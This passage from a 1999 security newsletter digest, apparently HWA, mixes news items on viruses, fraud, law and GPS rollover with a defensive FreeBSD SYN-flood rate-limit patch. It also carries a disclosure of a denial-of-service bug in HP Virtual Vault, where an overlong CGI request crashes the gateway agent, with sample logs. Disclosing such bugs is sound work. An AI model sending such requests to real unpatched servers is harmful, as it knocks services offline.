need to sell. As do the Antivirus developers. This was demonstrated nicely in December last year, when the Remote Explorer-virus hit the network of MCI Worldcom. Eventually it was proven to be an attempt for vengeance by one of the company's ex-employees. But by then the media-machine of AV-developer Network Associates had sadly labeled this virus, that spread through the Win NT networks of the company encrypting and resizing data files, as one of the worst viruses ever. This turned into just another marketing trick, in the hope to sell their fix which was miraculously discovered only a week after NA and the media had convinced the public that this was the big one. It's sad to see how some companies can put their name out to dry just to gain some more profit, but it's even sadder to see how easily the some journalists take over such a story to sell a few more papers or a little more advertising. Viruses just scare the crap out of the regular user because he doesn't know much on the subject. Let's look at where viruses come from for example. The main opinion on virus-writers and the virii-scene (VX) is almost one of hate. "Those rotten low-life computer-geeks who are only out for one thing: complete and utter destruction of ones data!" This view just shows how misinformed some people are. Of course there are some people out there who are really devoted to destruction, but they're to be found in every field. The effect some viruses have combined with the feeling of helplessness the average Joe feels when infected by one is one of the primary causes of this. The press can be named as another, but probably one of the biggest enemies here is the lack of knowledge on the matter. Don't get me wrong, I don't condone virus-writing in any way, I just don't condemn it either. One huge point is forgotten by people who discuss this topic like the sky is going to fall down. Computer viruses may cause damage but they have brought on immense technological development. I'd rather have some "bad guys" and also a lot of "good guys" who research and cooperate with each other on this field and in this way help developing methods to protect my pc then that the scene goes completely underground, leaving the AV-researchers only with the opportunity to research a virus when it starts spreading. Think about it. I don't want to come 'round quoting Confucius to y'all, but a doctor that cures when an illness starts to spread will of course get more fame then one that prevents the illness at the first signs. But which one would you prefer to be treated by? The one that let's you get sick first or the one that cures you at the first detection? The virus writers' community is split (like the general hacking community) into two camps. They refer to themselves as "Black Hats" and "White Hats". The "Black Hats" are mostly interested in doing damage and sometimes release viruses through e-mail or Usenet newsgroups. Though there are have been a lot of discussions on this subject, virus writing (leaving out the macro viruses here) requires a great amount of skill. A lot of the people who develop and research viruses could be called "hackers" instead of "vandalists", for what they do is aimed at technological progress and has certainly not always to do with destruction of data. This is proven by the fact that the majority of computer viruses never make it "into the wild". They reside only in virus libraries kept by writers and researchers. The claim that there are thousands of viruses around nowadays is, when you look at the above, just not accurate either. People who make these claims almost certainly work for the AV-companies or simply don't know what they're talking about. AV-companies count even the most insignificant variations of known viruses as new ones for advertising purposes. Most viruses are just variations on the same virus, sometimes even only differing one symbol in it's code or message (instead of "legalize" a variation of the good old Marijuana-virus later contained the word "legalize", is this a new virus???). In general AV-software is able to detect such variations on it's own nowadays and the few really new ones are quickly added to upgrades which every user can simply download from the manufacturers site. Sure, you can never detect all of them in time and sometimes data is lost, but virus scanners could detect CIH 1.2 even before it struck on the 26th of April and these technologies are still advancing rapidly. Another myth is the one that you can only get viruses by downloading from BBS's and the Internet. In fact, this is one of the least common ways of infection. Most sites nowadays use strict policies to make sure you won't get infected through anything you've downloaded there. It can happen sometimes of course, but I've never heard one of my friends complaining about this. A big chunk of the online infection-problem lies within e-mail, which spreads mostly macro-viruses. One of the main sources of viruses nowadays is the demand for more functions in our software, like the Corel or Microsoft Office scripting languages. WordBasic is a nice example of this. This microprogramming language which is part of the Microsoft Office-package allows an user to add new functions (in the form of macro's) to their copies of Word, Access or Excel. Problem is that only a select group of users knows how to uses this. Among them are the macro virus writers. The Melissa-macro virus is a nice recent example of this. Is it really necessary to have a zillion more functions if this opens up just as many new manners to attack ones data? Also one of the main problem lies besides downloading and employees holding a grudge the with the retail packages themselves. Besides some bugs and copy-protections gone bad, a lot of viruses are spread directly from the companies that might seem to be victims. For example, IBM recently recalled a shipment of Aptivas which were infected with the CIH-virus. Due to monopolizing of certain lines of software using the above mentioned scripting- languages, the problem cause by this spreads. Also with the development of new functions and technologies within vulnerable packages, even more new sources for virii come in existence every day. "So the next generation viruses will be even more destructive?", you might ask. I think the last two months have shown that. First we had the Melissa-virus. All major companies shut down their networks to keep from being infected and once again all AV-developers and journalists jumped on the virus-subject. Only to have the "plague" called Melissa overshadowed by a new one called CIH 1.2 a couple of weeks later. Where Melissa (and her variations) just caused a lot of extra email-traffic, CIH 1.2 attacked the (flash) BIOS and the HD's themselves. After his arrest (and release) the creator of the virus even told the press about two more destructive viruses he was working on! If you combine this with the Chaos Virus Theory, which predicts the advancement of future virus generations to intelligent, thinking and self-evolving viruses, question arises how we can ever prevail against these evil menaces? At the danger of sounding like I'm downplaying or underestimating the problem, I think we shouldn't panic to much on the subject though. Like I mentioned before, AV-research makes a lot of progress. This is mainly because of the cooperation between AV-companies and the virus-creators. If you start a manhunt on the latter, the first well be left empty-handed. The only way we will notice the new discoveries in this field then is by the time they've infected half the Internet. Of course we should be aware of certain elements in this scene, the ones insisting on inflicting damage and aiming for "Internet- anarchy". You can't judge a group of people by a (relatively small) segment of that group. Now the FBI is shutting down virii-sites like Codebreakers. While from one point of view this is necessary and only a logical step. While I agree that steps should be taken to prevent the kiddies from downloading virus-sources to impress their friend and in this way (intended or not) spread another infection, we shouldn't forget the fact that the only way to keep up and be able to actively and effectively combat this menace is by working together. We should beware not to force the "underground" to really go underground. Viruses present a very real threat, but don't get sucked into the hype. For all our sakes. Thejian Help Net Security http://net-security.org 48.0 The Internet Fraud Council ~~~~~~~~~~~~~~~~~~~~~~~~~~ THE INTERNET FRAUD COUNCIL by BHZ, Thursday 13th May 1999 on 4:23 pm CET Computer frauds cost the industry billions of dollars. Finally US authorities created The Internet Fraud Council - coalition of few companies that fight computer crime. They said that they will give their "Seal of approval" to companies that are fraud-free. Officials at the electronic crime center also announced yesterday a new FBI Internet Fraud Complaint Center, which will collect complaints from across the country. Read whole article on CNET Council formed to fight Net fraud By Reuters Special to CNET News.com May 11, 1999, 8:55 a.m. PT ORLANDO, Florida--With fraud on the Internet shaping up as the multibillion-dollar crime of the 1990s, U.S. authorities and antifraud groups yesterday launched fresh initiatives to combat Net crime. The Internet Fraud Council, a coalition of antifraud companies, said it will create a set of standards for companies doing business on the Internet, a clearinghouse of information on online crime, and a fraud-free "seal of approval" for such businesses operating in cyberspace. "It's hard for law enforcement to keep up," John Hiatt, president of the National Coalition for the Prevention of Economic Crime, said at a news conference during a meeting on economic crime. "The bandits change hardware and software every six months. In law enforcement, that number is 48 months," he said. Paul Fichtman, chairman of the Internet Fraud Council, said estimates of the cost of Internet fraud ranged from $9 billion to $108 Billion in 1998. "Clearly, there's no way anyone can estimate the amount of fraud on the Internet," he said. The Internet Fraud Council also said it would create a clearinghouse for information about online fraud. Most Internet crime involves the theft of identifying information, such as credit card or social security numbers from individual consumers. But thieves also steal corporate identities, posing as news services or financial analysts in order to float false reports that can send a stock soaring or plummeting. In April, an Internet posting of a false financial news story sent shares of PairGain Technologies, a small California company, soaring 31 percent, only to fall back to earth when the story proved false. "The Internet is quickly becoming a primary communications and e-commerce tool," said Norman Willox, chief executive of the National Fraud Center, a white-collar antifraud firm and one of the partners in the Internet Fraud Council. "Fraud on the Internet is increasing exponentially. Existing efforts [to fight it] have been so specialized or fragmented that they have been ineffective." Officials at the electronic crime center also announced yesterday a new FBI Internet Fraud Complaint Center, which will collect complaints from across the country. Willox said he expects the two centers to work together closely. "Right now there's no tool that measures the loss from economic crime on the Internet," he said. "It doesn't matter which organization is first to the scene of the crime as long as they share information." "What we want to do is give people tools that make it too expensive for these guys to be fraudulent," Fichtman said. "If we can do that, they'll leave the Internet and go somewhere else." @HWA 49.0 Credit Card fraud under watchful eyes of eFalcon 'electronic brain' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ EFALCON PREYS ON CREDIT FRAUD (BUS. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/19662.html It's an open secret that the Web is still the Wild West for credit-card crooks. HNC Software hopes its new anti-fraud software, eFalcon, will change that. By Craig Bicknell. EFalcon Preys on Credit Fraud by Craig Bicknell 3:00 a.m. 13.May.99.PDT You may not know it, but the last time you used your credit card to buy a sporty new shirt at the mall, you probably had to get the nod from a big brain named Falcon. A big electronic brain, that is. For the last six years, Falcon, software based on neural networks, has been analyzing the purchasing patterns of more than 260 million credit cards. Over time, it has learned to spot the telltale signs of fraud. Before most credit-card processors authorize a charge, they first get Falcon's OK. HNC Software, the creator of Falcon, hopes that online merchants will soon start doing the same. This week, the company launched eFalcon, a form of Falcon tweaked to detect the credit fraud that's so rampant online. See also: Credit Card Fraud Bedevils Web "Fraudulent transactions may exceed 10 percent of e-commerce merchant revenues.... That's a huge problem," said HNC chief Robert North. In comparison, fraudulent sales account for less than 1 percent of traditional retail revenues. Credit-card company rules mandate that Web merchants, not consumers, pick up the tab for bogus charges, plus a US$25 fee. It's a big strain for a fledging e-commerce company. EFalcon will help merchants spot potentially fraudulent transactions in a couple of different ways. When a user enters a credit-card number on a Web site, the number and information about the proposed purchase are zipped off to the Falcon database. There, the data will be assessed against the purchase history on the card and scored for likelihood of fraud. EFalcon bases the score on hundreds of factors, including the amount of purchase, the type of merchandise and store, the time since last purchase, and the location of the surfer's computer. If eFalcon has never seen the card before, it will generate a score based on the average buying patterns of all cardholders. The higher the score, the more likely the purchase is fraudulent. Merchants decide what the cutoff score will be for accepting a transaction. EFalcon will also take into account the way a surfer moves around the merchant's site. For example, a bona fide shopper is likely to linger before making a purchase, while a crook heads straight for the Buy button. Analysts who've taken a look at eFalcon are impressed. "I think it's going to be a big success," said Avivah Litan, research director for payment systems at Gartner Group. "They've got a lot of experience dealing with fraud in the physical world." That is also its limitation, said William Donahoo, vice president of marketing at CyberSource, a competing firm that also makes fraud detection software for the Web. Unlike HNC, CyberSource has been making anti-fraud software for the Web exclusively, since the earliest days of e-commerce. "The difference between the online world and the brick-and-mortar world is night and day," said Donahoo. "We're a fraud system built by the Internet and for the Internet." Still, he's glad to see HNC entering the market. "It's a validation that they, too, see the need for risk-management services online. Fraud will only become a bigger and bigger issue as more shoppers come onto the Web." @HWA 50.0 [ISN] A ban on unauthorized computer access in Japan to be enacted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the ISN mailing list Forwarded From: "Prosser, Mike" May 13, 1999 (TOKYO) -- Legislation to outlaw unauthorized access to computer networks will go into effect in Japan by the end of this year at the earliest, and the penalties will include fines or imprisonment. The bill, sponsored jointly by the National Police Agency, the Ministry of Posts and Telecommunications, and the Ministry of International Trade and Industry (MITI), was submitted to the Diet after it was adopted at a Cabinet meeting on April 16. It is expected to pass the Diet by the end of June. The concerned government agencies will make the bill to ban unauthorized access a new law, and not simply an amendment to the Criminal Law or the Telecommunications Business Law. Under the terms of the legislation, unauthorized access is defined as "any unauthorized logging in to a computer network using another person's ID or password, or any attack on a security hole in an operating system or application." The bill will ban such unauthorized access. The penalties will include imprisonment for up to one year or fines of up to 500,000 yen. (121.03 yen = US$1) Also, the bill will outlaw "any acts to promote unauthorized access" such as provision or sales of a user ID and password to a third party. In such cases, penalties will be fines of up to 300,000 yen. Even in the United States and Europe, where laws banning unauthorized access have already been enacted, few countries ban acts to promote unauthorized access. The bill will protect "all networked computers, those which control access with a user authentication via a user ID or password as well as authentication results" from unauthorized access. Networks will include the Internet, public circuits and corporate dedicated lines. The new bill will not require corporate system administrators to "preserve log on records of protected computers," which the NPA has sought. Preservation of logs was excluded from the bill based on discussions among the three concerned parties. In November 1998, the NPA sought to require companies to preserve their log records, based on its view that "those to be protected by the bill and obliged parties are identical." However, many companies said that such a requirement would impose a tremendous burden on them and that it wouldn't necessarily help prevent unauthorized access. Nonetheless, companies will still be expected to make their best efforts to preserve log records to detect any unauthorized access at an early stage and minimize damages. The bill will not have its intended effect unless companies take some measures to prevent unauthorized access. Therefore, the three parties decided to ask companies to implement voluntary efforts to take some measures to prevent unauthorized access. Specifically, system administrators are expected to manage passwords on a thorough basis, and to implement a variety of preventive measures. Although it is not legally binding, most system administrators will likely implement such preventive measures on a voluntary basis. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 51.0 Virtual Vault Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Virtual Vault Vulnerable contributed by John Daniele John Daniele has released a report that details a trivial DoS attack on HP's Virtual Vault operating system. Virtual Vault is a is a B1 and B2 DoD compliant system that is very popular with banks and e-commerce systems. HP claims to have addressed this problem in patch PHSS 10747 however numerous sites remain vulnerable. TGAD DoS http://www.faber.to/foo/vvos.htm VirtualVault Overview The VirtualVault operating system is HP's solution to secure electronic commerce. It is a B1 and B2 DoD compliant system that is becoming increasingly popular with big business, banks, etc., The main security mechanism in which VVOS is based upon is data partitioning. Data on the system is classified into one of four security classes, or 'vaults' -- INSIDE, OUTSIDE, SYSTEM and SYSTEM HIGH. The INSIDE vault houses the server's backend applications and databases. The OUTSIDE vault generally contains the internet front end and any necessary CGI binaries, etc. SYSTEM and SYSTEM HIGH are responsible for maintaining the external webpages and audit logs respectively. These vaults are totally segregated from each other and work essentially as separate machines. If a program requires access to either of the vaults it must be authenticated by HP's Trusted Gateway Proxy daemon. The TGP daemon filters all requests from the internet and forwards them to middleware server packages that safely reside behind the INSIDE vault. TGA Bug While the TGP daemon does a good job of ensuring the integrity of the request prior to forwarding data to its destination, the trusted gateway agent that is responsible for wrapping CGI requests does not check the length of the request prior to sending it to TGP. This poses a problem since TGA does not correctly handle request messages that are more than 512 bytes in length. The result is a trivial DoS attack on TGA and all services being wrapped by TGA. The bug was discovered during a penetration test on a client system running VVOS 3.01. A post was made to a CGI application residing on the system with a large string of characters. This was then sent to the trusted gateway agent, causing the daemon to crash, leaving the Netscape Enterprise Server unable to service further HTTP/SSL requests. The NES logs show the following: [07/May/1999:16:16:22] security: for host xxx.xxx.xxx.xxx trying to GET /cgi-bin/somecgi.cgi?AAAAAAAAAAAAAAA..., vvtga_log reports: ERROR: setup_connection(): Failed to transfer execution message to TGA daemon And when NES is started back up: [07/May/1999:16:28:18] info: successful server startup [07/May/1999:16:28:18] info: Netscape-Enterprise/3.5.1G B98.169.2301 [07/May/1999:16:33:18] failure: Error accepting connection -5993 (Resource temporarily unavailable) FIX Chris Hudel of HP was notified of this bug on Wednesday May 12, 1999. He stated that HP was aware of the problem and addressed it in patch PHSS 10747. However, I am not aware of HP releasing an official 'bug report' on this issue. Since I have encountered several VVOS systems this past week that have not been patched, and sysadmins unaware of this bug and patch, I decided to post the details publicly. NOTE: I have not tested this bug against PHSS 10747 and would appreciate input from those who have at foo@faber.to. - John Daniele jdaniele@kpmg.ca @HWA 52.0 GaLaDRiel PoC (Proof of concept) Corel virus resurfaces in the wild ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Corel Scripts Infected by New Virus From HNN http://www.hackernews.com/ contributed by tetricycle The the GaLaDRiel (or C.S.Gala) virus infects the script language used by Corel products. This particular version is not malicious and only displays a text message. The message is only displayed on June 6 and contains seven lines from J.R.R. Tolkien's The Lord of the Rings. PC World http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html Virus Infects Corel Scripts Virus is low risk, not easily spread, and causes minor damage. by Stan Miastkowski, special to PC World May 13, 1999, 6:38 p.m. PT A new wrinkle in computer viruses appeared this week with the discovery of a virus that infects the script language used by Corel products. But experts say the GaLaDRiel (or C.S.Gala) virus will affect few users, and is not destructive. The virus is not contained in the company's applications, according to a Corel representative. You can get it only by receiving an infected script file from another user via disk or download. When it triggers, all the virus does is display text. GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for Network Associates, maker of McAfee Antivirus. The virus is rare, doesn't spread easily, and causes minimal damage, Viveros says. Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't launch automatically. You have to run the infected script for it to spread. And the virus doesn't infect program files. After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only, displaying seven lines from J.R.R. Tolkien's The Lord of the Rings. As far as virus researchers have been able to ascertain, GaLaDRiel does nothing else. All major developers of antivirus software plan to add detection and removal of GaLaDRiel to their latest virus updates within the next two weeks. How to Check for the Virus Corel recommends taking the following steps to see if your scripts have been infected and to remove the virus if they have been: 1. Using Windows Explorer, browse the directory that contains the potentially infected scripts. 2. Right-click on a Corel script.csc file and select Open. 3. When the Corel Script Editor opens, examine the first line of the script. If the text begins with REM ViRUS GaLaDRiel, then your script is infected. 4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM END OF ViRUS. 5. Resave your Corel Script file with the same name, overwriting the infected version. 6. Repeat the above steps for all .csc files in the same directory. (This final step is important, because running any infected Corel Script file will infect all other .csc files in the same directory.) @HWA 53.0 DoD labels attacks as 'nuisance' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ DOD Labels Attacks as "Nuisance" contributed by erewhon The Defense Information Agency's Joint Task Force for Computer Network Defense has labeled the recent attacks of DOD web sites by Chinese individuals as nothing more than a nuisance and that the attacks have had "no operational impact or effect." Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0510/web-nuisance-5-13-99.html MAY 13, 1999 . . . 18:40 EDT Pentagon confirms 'nuisance' cyberattacks BY BOB BREWIN (antenna@fcw.com) The Pentagon identified what it called "nuisance-level" attacks against its World Wide Web sites that resemble the attacks by Chinese hackers against sites operated by the departments of Energy and Interior earlier this week. In response to a query from FCW about any Chinese attacks against DOD Web sites, a spokeswoman for the Defense Information Agency's Joint Task Force for Computer Network Defense said, "We're aware of the activities you mention. The JTF-CND has only a few isolated reports of activities across DOD which might be attributed to these sources. The damage has been at the 'nuisance level' with no operational impact or effect." The spokeswoman added that the JTF-CND would take action only when such attacks would have a "widespread effect" on the Defense Information Infrastructure, which comprises global DOD networks and information systems, or when such attacks are spread broadly across network or information systems operated by more than one of the services. According to nongovernment network security experts, Chinese hackers launched Web attacks earlier this week in response to the U.S. bombing of the Chinese embassy in Belgrade. @HWA 54.0 GPS's Y2K crisis comes early ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Jan 1, 2000 or Aug 21, 1999, which is worse? contributed by Time L0rd By now everyone has heard of Y2K. How many have heard of August 21? That is the date when many handheld GPS systems may go wacko. The GPS satellites keep track of dates by measuring the number of weeks elapsed since January 5-6, 1980. Every 1,024 weeks, the timer will resets to zero. The first time this will happen is August 21. People suspect that older GPS units may not be able to read this time accurately. (I knew there was a reason I waited buy one) CNN Experts say consumers may be hardest hit by GPS computer time change May 12, 1999 Web posted at: 7:35 PM EDT (2335 GMT) WASHINGTON (AP) -- By now everyone knows about computers and midnight, December 31. But what's going to happen on August 21? That's when computer clocks roll over in the Global Positioning System, the network of satellites that keeps ships and nuclear missiles on course and provides precise time measurements for computer networks and public utilities. A joint congressional subcommittee held a hearing Wednesday to assess the potential impact. It heard that while the military and space communities are ready for the adjustment, consumers and small businesses may be the hardest hit. The Global Positioning System is made up of 24 orbiting satellites that allow anyone with a GPS receiver to pinpoint their position on Earth. The satellites keep track of dates by measuring the number of weeks elapsed since January 5-6, 1980. Every 1,024 weeks, the timer will reset to zero, which will occur for the first time as August 21 turns to August 22. "The satellites will not fall out of the sky, they will not lose their power," Keith Rhodes, technical director in the Office of the Chief Scientist at the General Accounting Office, told members of the House Science and Government Reform committees. "The problem will be on the ground, with what you hold in your hand." Handheld receivers such as those popular with mountaineers, sailors and some motorists are "probably going to have a problem" if they are more than five years old, Rhodes said. Also vulnerable are small computer networks that rely on GPS time signals, a desirable form of time measurement because they are accurate to within three-billionths of a second. More widespread computer problems are expected a little more than four months later, when the calendar changes from December 31, 1999, to January 1, 2000 -- the Y2K witching hour. Many computers originally programmed to recognize only the last two digits of a year will not work properly beginning January 1, 2000, when some machines will assume it is 1900 and could therefore malfunction. @HWA 55.0 Retinal Scans? ~~~~~~~~~~~~~~ Forget giving your sister your atm card to grab you some cash when you can't get out... From HNN http://www.hackernews.com/ "Prepare for Retina Scan" contributed by Shatner No ATM card or PIN numbers needed. Bank United, based in Texas, is the first to offer Iris scans at its ATMs for its customers. Just walk up to the ATM, let the computer check out your eyeball and withdraw some dough. In response to questions about privacy concerns, Bank United said the iris pictures will not be distributed to anyone outside the bank. (Unless they get subpoenaed or cracked, of course.) Nando Times http://www.techserver.com/story/body/0,1634,48513-78144-556814-0,00.html Texas bank offers 1st eye-recognition ATM in U.S. Copyright © 1999 Nando Media Copyright © 1999 Associated Press By TERRI LANGFORD HOUSTON (May 13, 1999 6:03 p.m. EDT http://www.nandotimes.com) - If you can't tell twins Michael and Richard Swartz apart, do what Bank United of Texas does - look them in the eye. On Thursday, the bank became the first in the United States to offer iris recognition technology at automated teller machines, providing the Swartzes and other customers a cardless, password-free way to get their money out of an ATM. "It knows you just by looking at you," said Ron Koben, Bank United executive vice president. The concept works because the intricate pattern of each person's iris is more distinctive than even a fingerprint. Here's how it works: A customer has a close-up photo of his eye taken at the bank, and the picture is stored in a computer. When the customer goes up to the ATM to take out money, he presses a button to start an eye scan. The ATM then matches the picture of the iris with the one stored in the bank's database to confirm the customer's identity. To demonstrate, Richard Swartz, a 25-year-old Rice University graduate student, had his iris photographed by a bank employee. Minutes later, Swartz was able to withdraw $40 from his account without inserting a card or punching in a secret code. Then, Swartz's brother Michael walked up to the machine. But since his iris didn't match his brother's, the ATM refused access. Iris identification is already used at 11 banks outside the United States and may eventually be extended to many other kinds of financial transactions. Bank United hopes to have more eye-scanning ATMs up and running within the next year. Several other banks in the United States are expected to unveil iris identification teller machines later this year. "It has a very high cool factor," Koben said. "We think of it as James Bond meets stocks and bonds." The iris recognition and software process was invented a few years ago by John Daughman of Cambridge University in England. It is marketed in this country to financial institutions by Sensar Inc. of Moorestown, N.J. "This event clearly establishes iris identification as the emerging standard in personal electronic identfication," said Robert Van Naarden, Sensar vice president of marketing and customer service. "Iris identification is the most secure, robust and stable form of identification known to man." In response to questions about privacy concerns, Bank United said the iris pictures will not be distributed to anyone outside the bank. @HWA 56.0 FreeBSD high speed SYNflood patch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Return-Path: Date: Thu, 13 May 1999 11:35:43 -0700 Reply-To: Richard Steenbergen Sender: Bugtraq List From: Richard Steenbergen Subject: SYN floods against FreeBSD To: BUGTRAQ@netspace.org Here's a quickie for the people who have been plagued with high bandwidth syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits SYN processing. Its messy but functional and I don't have time to make it better (thats the fbsd developers job, not mine :P), cd /usr/src/sys, patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be available (default to 100). This is the maximium number of SYNs per second that will be processed, the rest will be silently discarded. On my test system (P2 450 running 3.1-stable being hit w/15,000 packets per sec), this has successfully brought CPU usage from 100% to ~20% (against an open port which is replying with unacknowledged ACKs). Which brings us to the more sticky topic of kernel panics when under SYN flood (which I believe to be the cause of some earlier posts from certain people at Exodus Communications *cough*). Lord knows I found enough of them when doing this testing, but the one that seems to be the biggie for crashing when under syn flood is as follows (heh just turned off the synlim and panic'd within 8 seconds while writing this): panic: free: multiple frees (kgdb) bt #0 boot (howto=256) at ../../kern/kern_shutdown.c:285 #1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees") at ../../kern/kern_shutdown.c:446 #2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330) at ../../kern/kern_malloc.c:333 #3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262 #4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236 #5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0, netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536 #6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610) at ../../netinet/in_rmx.c:242 #7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc , w=0xc0231610) at ../../net/radix.c:956 #8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283 #9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124 Which after a quick examination seems to be a perioditic routing table cleanup. It seems that in_rtqtimo is scheduled to run every net.inet.ip.rtexpire seconds (which is dynamicly adjusted and can never go lower then net.inet.ip.rtminexpire). When the system is under heavy load from processing lots of small packets (they don't even have to be SYNs, anything which can get routed will do the trick, though the packet kiddies would get very little gain from just sending an ip header since its going to be padded to 64 bytes for the eth frame anyhow), this route cleanup code will go wacking at routes it shouldn't and free some memory twice. In the course of testing I've gotten my rtq_reallyold to -3 and seen lots of "tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with free time or more specific knowledge of this area would like to FIX IT? =) Perhaps when I get more free time I'll test some other *nix's. I would really recommend putting all this rate limiting code at an ipfw level. If you would like to contact me regarding this please use humble@quadrunner.com (at least if you want a quick reply), thanks. -- Richard Steenbergen humble@EFNet PGP ID: 0x741D0374 PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374 http://users.quadrunner.com/humble synlim *** conf/options.old Sat May 15 23:08:03 1999 --- conf/options Sat May 15 23:40:21 1999 *************** *** 68,73 **** --- 68,74 ---- SYSVSHM opt_sysvipc.h UCONSOLE ICMP_BANDLIM + SYN_RATELIM # POSIX kernel options P1003_1B opt_posix.h *** netinet/tcp_var.h.old Sat May 15 23:25:39 1999 --- netinet/tcp_var.h Sat May 15 23:45:05 1999 *************** *** 40,45 **** --- 40,49 ---- * Kernel variables for tcp. */ + #ifdef KERNEL + #include "opt_syn_ratelim.h" + #endif + /* * Tcp control block, one per tcp; fields: * Organized for 16 byte cacheline efficiency. *************** *** 305,311 **** #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_MAXID 12 #define TCPCTL_NAMES { \ { 0, 0 }, \ --- 309,316 ---- #define TCPCTL_RECVSPACE 9 /* receive buffer space */ #define TCPCTL_KEEPINIT 10 /* receive buffer space */ #define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */ ! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */ ! #define TCPCTL_MAXID 13 #define TCPCTL_NAMES { \ { 0, 0 }, \ *************** *** 320,325 **** --- 325,331 ---- { "recvspace", CTLTYPE_INT }, \ { "keepinit", CTLTYPE_INT }, \ { "pcblist", CTLTYPE_STRUCT }, \ + { "synlim", CTLTYPE_INT }, \ } #ifdef KERNEL *** netinet/tcp_input.c.old Sat May 15 23:08:10 1999 --- netinet/tcp_input.c Sun May 16 01:33:51 1999 *************** *** 72,77 **** --- 72,85 ---- static struct tcpiphdr tcp_saveti; #endif + #ifdef SYN_RATELIM + static int synlim = 100; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, ""); + #else + static int synlim = -1; + SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, ""); + #endif + static int tcprexmtthresh = 3; tcp_seq tcp_iss; tcp_cc tcp_ccgen; *************** *** 98,104 **** struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! /* * Insert segment ti into reassembly queue of tcp with --- 106,112 ---- struct tcpiphdr *, struct mbuf *)); static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *)); static void tcp_xmit_timer __P((struct tcpcb *, int)); ! static int syn_ratelim(void); /* * Insert segment ti into reassembly queue of tcp with *************** *** 130,135 **** --- 138,183 ---- } \ } + #ifdef SYN_RATELIM + int syn_ratelim(void) + { + static int lticks; + static int lpackets; + int dticks; + + /* + * Return ok status if feature disabled or argument out of + * ranage. + */ + + if (synlim <= 0) + return(0); + + dticks = ticks - lticks; + + /* + * reset stats when cumulative dt exceeds one second. + */ + + if ((unsigned int)dticks > hz) { + if (lpackets > synlim) + printf("syn rate limit reached %d/%d pps\n", lpackets, synlim); + lticks = ticks; + lpackets = 0; + } + + /* + * bump packet count + */ + + if (++lpackets > synlim) { + return(-1); + } + + return(0); + } + #endif + static int tcp_reass(tp, ti, m) register struct tcpcb *tp; *************** *** 379,384 **** --- 427,438 ---- ip_fw_fwd_addr = NULL; } else #endif /* IPFIREWALL_FORWARD */ + + #ifdef SYN_RATELIM + if ((tiflags & TH_SYN) && !(tiflags & TH_ACK)) + if (syn_ratelim() < 0) + goto drop; + #endif inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport, ti->ti_dst, ti->ti_dport, 1); @HWA 57.0 Industry rises up against MP3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I was waiting for this, it took them long enough but it looks like industry is finally waking up to the threat of MP3 and are beginning to make some noise about it. MUSIC BIZ BUILDS A TIME BOMB (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/19682.html The Recording Industry Association of America is out to exterminate MP3 -- and is pressuring hardware and software makers to build in a "kill switch" that would take care of it once and for all. By Christopher Jones. Music Biz Builds A Time Bomb by Christopher Jones 3:00 a.m. 14.May.99.PDT The future of digital music delivery is at stake as technology companies and record labels try to bridge their multibillion-dollar industries. But the two sides are making little progress, reports one tech- industry insider, who says that the music industry is taking a "my way or the highway" approach. Facing the loss of its lucrative distribution chains and existing contracts with retailers, the record industry has a plan to force hardware and software companies to exclusively adopt its Secure Digital Music Initiative as the standard for delivering music online. At last week's SDMI meeting in London, a handpicked committee proposed a plan that could force hardware and software developers to choose among wannabe SDMI, the de facto standard MP3, or a different compressed file format for the development of digital music players and similar hardware. SDMI backers want manufacturers to build a time-bomb trigger into their 